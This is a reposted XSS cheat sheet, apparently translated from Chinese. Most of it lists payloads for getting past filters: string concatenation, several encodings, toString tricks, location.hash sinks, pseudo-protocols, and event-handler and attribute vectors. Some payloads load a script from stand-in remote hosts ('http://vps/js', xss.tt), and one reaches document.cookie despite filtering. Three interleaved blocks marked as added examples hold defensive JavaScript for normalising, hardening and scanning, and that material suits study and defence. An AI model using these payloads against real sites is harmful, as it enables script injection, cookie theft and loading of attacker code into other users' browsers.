XSS Cheat Sheet

 4 years ago
source link: https://www.tuicool.com/articles/zqaUNbE

If you run into something you have not seen before or do not understand, Google it and read the documentation first.

To start, everyone should take a look at this site:

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

If you cannot find a usable technique on that site while testing, then... emmm... give up.


Below are some techniques I use often in my work. All of them come from the generous sharing of various experts online, so let me say thank you on my own behalf first.

1. Concatenation

Objects (aliases of the global object) that can prefix the call:

top, this, self, parent, frames, content, window

For example:

<body/onfocus=top.alert(1)>
<body onpageshow=top['confir'%2b'm'](1)>
<audio src/onerror=self['pro'+'mpt'](1)>
<details ontoggle=this['ale'+'rt']`1` open>
<marquee onstart=top.eval('ale'%2B'rt(1)')>
<img/src=1 onerror=window.alert(1)>
<svg onload="a(this);function a(){}(alert`1`)">

2. Encoding

Common encoding types: URL encoding, base64, hex, JS octal escapes (JS8), JS hex escapes (JS16), Unicode escapes, HTML entities

Because the payload is encoded, some function is needed to execute it, for example: eval, setTimeout, setInterval, constructor, execScript (IE), etc.

# URL
<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%31%29'))">
<details open ontoggle=eval('%61%6c%65%72%74%28%31%29')>
<details open ontoggle=%65%76%61%6c(atob('YWxlcnQoMSk='))>
# base64
<details open ontoggle=eval(atob('YWxlcnQoMSk='))>
# JS8
<body onpageshow=content['\141\154\145\162\164'](1)>
<svg/onload=setTimeout('\141\154\145\162\164\50\61\51')>
# JS16
<body onpageshow=frames['\x61\x6c\x65\x72\x74'](1)>
<svg/onload=Set.constructor`al\x65rt\x281\x29```>
<svg/onload=Map.constructor`al\x65rt\x281\x29```>
<svg/onload=clear.constructor`al\x65rt\x281\x29```>
<svg/onload=Array.constructor`al\x65rt\x281\x29```>
<svg/onload=WeakSet.constructor`al\x65rt\x281\x29```>
# unicode
<a href="javascript:al\u0065rt()">XSS Test</a>
<a href="javascript:al\u{65}rt()">XSS Test</a>
<svg/onload=\u0073etInterval('\141\154\145\162\164\50\61\51')>
<svg/onload=setTimeout`prompt\u00281\u0029`>
# Ascii
<img/src=1 onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">

3. Strings

Using regular expressions to produce the string

eval('~a~le~rt~~(~~1~~)~'.replace(/~/g, ''))
eval(/~a~le~rt~~(~~1~~)~/.source.replace(/~/g, new String()))
<a href="javascript:window[/alert/.source]()">XSS Test</a>
<a href="javascript:''.replace(/.*/,alert)">XSS Test</a>
<img src=1 onerror=eval('~a~le~rt~~(~~1~~)~'.replace(/~/g, ''))>

Using toString to produce the string.

Integer toString(radix) converts a number to a string; in 8680439..toString(30) the first dot makes the literal a floating-point number and the second dot calls the method

<a href="javascript:top[8680439..toString(30)]()">XSS Test</a>
<details open ontoggle=top[8680439..toString(30)](1);>
<details open ontoggle=top[11189117..toString(32)](1);>

Parsing the string alert with parseInt in base 30 gives 8680439

parseInt('alert',30) == 8680439

toString turns the number 8680439 back into the string using base 30

8680439..toString(30) == 'alert'
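As an added example (not from the original post), here is a defender-side normaliser that peels the layers from sections 2 and 3 above (percent-encoding, JS octal/hex/unicode escapes, split string literals and the N..toString(radix) trick) and reports which sink name surfaces; the input format (raw handler text captured by a proxy or WAF) and the sink list are assumptions.

```javascript
// Added example (not from the original post): a defender-side normaliser that
// peels the obfuscation layers listed in sections 2 and 3 (URL %XX, JS \ooo,
// \xHH, \uHHHH and \u{H} escapes, 'str'+'ing' splits, N..toString(radix)) so a
// detector or a reviewer sees the name of the sink that actually executes.
// Assumed input: the raw handler/attribute text as captured by a proxy or WAF.

const SINKS = ['alert', 'prompt', 'confirm', 'eval', 'settimeout',
               'setinterval', 'constructor', 'function'];

function percentDecode(s) {
  return s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// JS string escapes: \u{...}, \uHHHH, \xHH and 1-3 digit octal (\141 = 'a').
function jsEscapeDecode(s) {
  return s
    .replace(/\\u\{([0-9a-f]{1,6})\}/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\([0-7]{1,3})/g, (_, o) => String.fromCharCode(parseInt(o, 8)));
}

// 'ale'+'rt' (or 'ale'%2B'rt' once percent-decoded): merge adjacent literals.
function joinConcat(s) {
  return s.replace(/(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3/g,
                   (_, q, a, __, b) => q + a + b + q);
}

// 8680439..toString(30) is just 'alert' spelled in base 30; evaluate it.
function radixDecode(s) {
  return s.replace(/(\d+)\.\.toString\((\d+)\)/g, (m, n, r) =>
    (Number(r) >= 2 && Number(r) <= 36) ? "'" + Number(n).toString(Number(r)) + "'" : m);
}

// Apply every layer until nothing changes (bounded, since layers can nest).
function normalize(raw) {
  let s = raw, prev = null;
  for (let i = 0; i < 8 && s !== prev; i++) {
    prev = s;
    s = radixDecode(joinConcat(jsEscapeDecode(percentDecode(s))));
  }
  return s;
}

// Names of sinks that surface after normalisation (for a rule or an alert).
function findSinks(raw) {
  const n = normalize(raw).toLowerCase();
  return SINKS.filter((k) => n.includes(k));
}
```

The regex-source trick (/al/.source+/ert/.source) is not decoded here; a rule that flags `.source` next to a bracket lookup covers it separately.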

4. Different ways to call a function

<a href="javascript:alert.call(null,'param')">XSS Test</a>
<a href="javascript:alert.apply(null,['param'])">XSS Test</a>
<a href="javascript:alert.bind()('param')">XSS Test</a>
<a href="javascript:Reflect.apply(alert,null,['param'])">XSS Test</a>
<a href="javascript:setTimeout`alert\x28\x29`">XSS Test</a>
<a href="javascript:eval(atob())">XSS Test</a>
<a href="javascript:eval(String.fromCharCode(97,108,))">XSS Test</a>
<img src=1 onerror=(function(){alert(1)})()>
<img src=1 onerror=!function(){alert(1)}()>
<img src=1 onerror=%2bfunction(){alert(1)}()>
<img src=1 onerror=%2dfunction(){alert(1)}()>
<img src=1 onerror=~function(){alert(1)}()>
<a href="javascript:(alert)()">XSS Test</a>
Template literal: backticks ``
<a href="javascript:`${alert(1)}`">XSS Test</a>

5. Using array and similar utility functions

<a href="javascript:[''].find(alert`1`)">XSS Test</a>
<a href="javascript:[''].findIndex(alert(1))">XSS Test</a>
<a href="javascript:[''].filter(alert)">XSS Test</a>
<a href="javascript:[''].forEach(alert)">XSS Test</a>
<a href="javascript:(new Map()).set(1,'').forEach(alert)">XSS Test</a>
<a href="javascript:(new Set([''])).forEach(alert)">XSS Test</a>

Using array concatenation functions

concat() not only joins two or more arrays, it can also merge two or more strings

<svg/onload=location='javas'.concat('cript:ale','rt(1)')>
<iframe onload=s=createElement('script');body.appendChild(s);s.src='http://v'.\u0063oncat('ps/','js');>

One more: some protections filter document.cookie; try the following, it works nicely

document['coo'['CONCAT'.toLowerCase()]('kie')]

join() converts an array into a string

<iframe onload=location=['javascript:alert(1)'].join('')>

6. Creating a new function

<a href="javascript:(new Function('alert()'))()">XSS Test</a>
<body/onload=Function(alert(1))()>
<img%0Dsrc=1 onerror=Function(alert(1))>
<a href="javascript:Set.constructor`alert\x28\x29```">XSS Test</a>
<a href="javascript:(new (Object.getPrototypeOf(async function(){}).constructor)('alert()'))()">XSS Test</a>

7. location

The hash property of the location object gets or sets the anchor part of the URL, e.g. http://localhost/1.php#alert(1) ; typing location.hash in the console returns what we set, i.e. #alert(1)

Combine it with string functions such as slice(), substr() to extract the string

<body/onload=eval(location.hash.slice(1))>#alert(1)
<body/onload=setTimeout(location.hash.substr(1))()>#alert(1)
<body/onload=Set.constructor(location.hash.substr(1))()>#alert(1)
<body/onload=execScript(location.hash.substr(1))>#alert(1)
Using the Function constructor to execute the code at the end of the URL
<body/onload=Function(location.hash.slice(1))()>#alert(1)

By the same logic location.search works similarly: part of the parameters can be placed after ?

# dom.html
<html>
  <body>
    <script>
document.write(decodeURI(window.location.search));
</script>
  </body>
</html>
# payload
dom.html?<svg/onload=alert(1)

1.php?(1)&code=<img/src=1 onerror=a=location.search;location="javascript:alert"+a[1]+a[2]+a[3]>

Another example:

<svg onload=eval(URL.slice(-8))>#alert(1)
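As an added example (not part of the original post), the dom.html sink above modelled as pure functions so the vulnerable and hardened behaviour can be compared offline; the function names and the allowlist rule for the fragment are assumptions. Note that location.hash never reaches the server, so server-side filtering or logging cannot catch the #alert(1) payloads; the fix has to be in the client code.

```javascript
// Added example (not from the original post): the dom.html sink above modelled as
// pure functions so the unsafe and hardened behaviour can be compared offline.
// renderUnsafe mirrors document.write(decodeURI(location.search)); renderSafe is
// the fix: treat the query as text and escape it. routeFromHash replaces the
// eval(location.hash.slice(1)) pattern with an allowlist, which is the only place
// a fragment can be checked: location.hash never reaches the server, so
// server-side filters and access logs do not see it. All inputs are constructed.

function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// decodeURI throws on a malformed %xx sequence; keep the raw text in that case.
function safeDecode(s) {
  try { return decodeURI(s); } catch { return s; }
}

// Vulnerable: the query string becomes markup, so <svg/onload=...> is parsed and run.
function renderUnsafe(search) {
  return safeDecode(search);
}

// Hardened: same text, but every markup-significant character is encoded.
// In the page itself this is el.textContent = ..., never innerHTML/document.write.
function renderSafe(search) {
  return escapeHtml(safeDecode(search));
}

// Hardened hash handling: only an identifier-like fragment is accepted, so
// eval(), setTimeout(), Function() or execScript() never receive it as code.
function routeFromHash(hash) {
  const m = /^#([A-Za-z0-9_-]{1,64})$/.exec(hash);
  return m ? m[1] : null;
}

// Review helper: would this output be parsed as a start tag?
function containsStartTag(html) {
  return /<[a-z]/i.test(html);
}
```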

9. Pseudo-protocols

Common pseudo-protocols: javascript:, vbscript: (IE only), data:

<body/onload=eval(location.hash.slice(1))>#javascript:alert(1)
<body/onload=eval(location.hash.slice(1))>#vbscript:msgbox(1)
<a href="javascript:confirm(1)">XSS Test</a>
<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1)">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
<iframe/src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
<video><source onerror="javascript:confirm(1);">
<img src=1 onerror=location="javascript:alert(1)">
# using the xmlns attribute
<svg/onload="javascript:alert(1)" xmlns="http://www.baidu.com">
# using a comment
<svg/onload=location='javascript:/*'%2blocation.hash> #*/alert(1)
# innerHTML
<svg/onload=location="javascript:"%2binnerHTML%2blocation.hash>"  #"-alert(1)

10. unescape

The unescape() function decodes a string that was encoded with escape() and returns the decoded string.

Many filters block external URLs, for example by blocking //

<svg/onload=appendChild(createElement('script')).src=unescape('http%3A%2F%2Fxss.tt%2F1te')>

11. with

with brings the existing properties of a given object into scope, so an object can be referenced through its node name.

If . is blocked, with can be used instead.

<svg/onload=with(location)with(hash)eval(alert(1))>

Creating and inserting nodes through the DOM to load an external JS file into the page can also use with.

<svg/onload="[1].find(function(){with(`docom'|e|'nt`);;body.appendChild(createElement('script')).src='http://vps/js'})">

12. Parentheses filtered

<svg/onload="window.onerror=eval;throw'=alert\x281\x29';">
<img/src=1 onerror="top.onerror=alert; throw 1">
<img src=x onerror=alert`1`>
<img src=1 onerror=alert%28%29>
<img src=1 onerror=location="javascript:"+"aler"+"t%281%29">

13. Loading an external URL

Create and insert a node to load an external JS file into the page

<details open ontoggle=eval("appendChild(createElement('script')).src='http://vps/js'")>
<iframe onload=s=createElement('script');body.appendChild(s);s.src='http://v'.concat('ps/','js');>
<body/onload=document.write(String.fromCharCode(60,115,67,114,73,112,116,32,115,114,67,61,104,116,116,112,58,47,47,118,112,115,47,106,115,62,60,47,115,67,82,105,112,84,62))>
Using link
<link rel=import href="http://vps/1.js">

14. Assignment

# variables
<img/src=1 onerror=_=alert,_(1)>
<style onload=_=alert;_(1)>
<details/open/ontoggle=_=alert;x=1;_`1`>
<details open ontoggle=top[a='al',b='ev',b%2ba](prompt(1))>
<details open ontoggle=top[a='al',b='ev',b%2ba]('\141\154\145\162\164\50\61\51')>
<details open ontoggle=top[a='meout',b='setTi',b%2ba]('\141\154\145\162\164\50\61\51')>
# functions
<img/src=1 onmouseover="a=alert,a`1`">
# attributes
<img src=1 alt=al lang=ert onerror=top[alt%2blang](1)>

15. Blacklists

Taking alert(1) as the example:

(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
self[/al/.source+/ert/.source](1)
al\u0065rt(1)
frames['al\145rt'](1)
content[8680439..toString(30)](1)

16. Tags

16.1. body

<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#></a>
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x

16.2. Others

<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!

There are far too many; once again, take a good look at this site:

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

17. Event handlers

<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
<brute contenteditable onblur=alert(1)>lose focus!
<brute onclick=alert(1)>click this!
<brute oncopy=alert(1)>copy this!
<brute oncontextmenu=alert(1)>right click this!
<brute oncut=alert(1)>copy this!
<brute ondblclick=alert(1)>double click this!
<brute ondrag=alert(1)>drag this!
<brute contenteditable onfocus=alert(1)>focus this!
<brute contenteditable oninput=alert(1)>input here!
<brute contenteditable onkeydown=alert(1)>press any key!
<brute contenteditable onkeypress=alert(1)>press any key!
<brute contenteditable onkeyup=alert(1)>press any key!
<brute onmousedown=alert(1)>click this!
<brute onmousemove=alert(1)>hover this!
<brute onmouseout=alert(1)>hover this!
<brute onmouseover=alert(1)>hover this!
<brute onmouseup=alert(1)>click this!
<brute contenteditable onpaste=alert(1)>paste here!
<brute style=font-size:500px onmouseover=alert(1)>0000
<brute style=font-size:500px onmouseover=alert(1)>0001
<brute style=font-size:500px onmouseover=alert(1)>0002
<brute style=font-size:500px onmouseover=alert(1)>0003

18. Attributes

# src
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
# href
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
# action
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
# formaction
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
<isindex formaction=javascript:alert(1) type=submit value=click>
# data
<object data=javascript:alert(1)>
# srcdoc
<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
# xlink:href
<svg><script xlink:href=data:,alert(1)></script>
<svg><script xlink:href=data:,alert(1)/>
<math><brute xlink:href=javascript:alert(1)>click
# from
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400/><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
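As an added example (not from the original post), a scanner for the two attribute classes listed in sections 9 and 18: on* handlers, and URL-bearing attributes whose value resolves to javascript:, vbscript: or data: after percent-decoding, entity-decoding and removal of the whitespace/control bytes the %0A payload relies on; the attribute list and function names are assumptions.

```javascript
// Added example (not from the original post): a defender-side scanner for the
// attribute classes in sections 9 and 18: any on* handler, and a URL-bearing
// attribute that resolves to javascript:/vbscript:/data: once percent-encoding,
// entities and the ASCII whitespace/control bytes browsers skip are removed.
// srcdoc values are re-scanned as HTML. Assumed input: a raw HTML string.

const URL_ATTRS = new Set(['src', 'href', 'action', 'formaction', 'data',
                           'xlink:href', 'from', 'to']);
const SCHEMES = /^(javascript|vbscript|data):/i;
const NAMED = { lt: '<', gt: '>', amp: '&', quot: '"', equals: '=',
                lpar: '(', rpar: ')', colon: ':' };
const cp = (n) => (n <= 0x10ffff ? String.fromCodePoint(n) : '');

// URL-decode first (the value travelled in a URL), then HTML entities.
function decodeValue(v) {
  return v
    .replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#x([0-9a-f]{1,6});?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d{1,7});?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&([a-z]+);?/gi, (m, n) => NAMED[n.toLowerCase()] ?? m);
}

function effectiveScheme(v) {
  const m = decodeValue(v).replace(/[\x00-\x20]/g, '').match(SCHEMES);
  return m ? m[1].toLowerCase() + ':' : null;
}

// Tolerates '/' as an attribute separator (<svg/onload=...), quoted or bare values.
function scanMarkup(html, depth = 0) {
  const findings = [];
  const tagRe = /<([a-z][\w:-]*)([^>]*)>/gi;
  const attrRe = /([^\s\/=>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]*)))?/g;
  for (let t; (t = tagRe.exec(html)) !== null;) {
    const tag = t[1].toLowerCase();
    for (let a; (a = attrRe.exec(t[2])) !== null;) {
      const name = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? '';
      if (name.startsWith('on')) {
        findings.push({ tag, attr: name, reason: 'event-handler' });
      } else if (URL_ATTRS.has(name)) {
        const scheme = effectiveScheme(value);
        if (scheme) findings.push({ tag, attr: name, reason: scheme });
      } else if (name === 'srcdoc' && depth < 3) {
        findings.push(...scanMarkup(decodeValue(value), depth + 1));
      }
    }
  }
  return findings;
}
```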

Common exploitation combinations in penetration testing

  • XSS + CSRF
  • XSS + file upload
  • XSS + SSRF
  • XSS + DoS
  • XSS + RCE
  • XSS + NTLM hash
  • XSS + file read
  • ...

I have compiled the case studies for everyone, with blood, sweat and tears; help yourselves.

Compendium of XSS exploitation cases in penetration testing (deluxe edition): https://ml.mk/Tjc
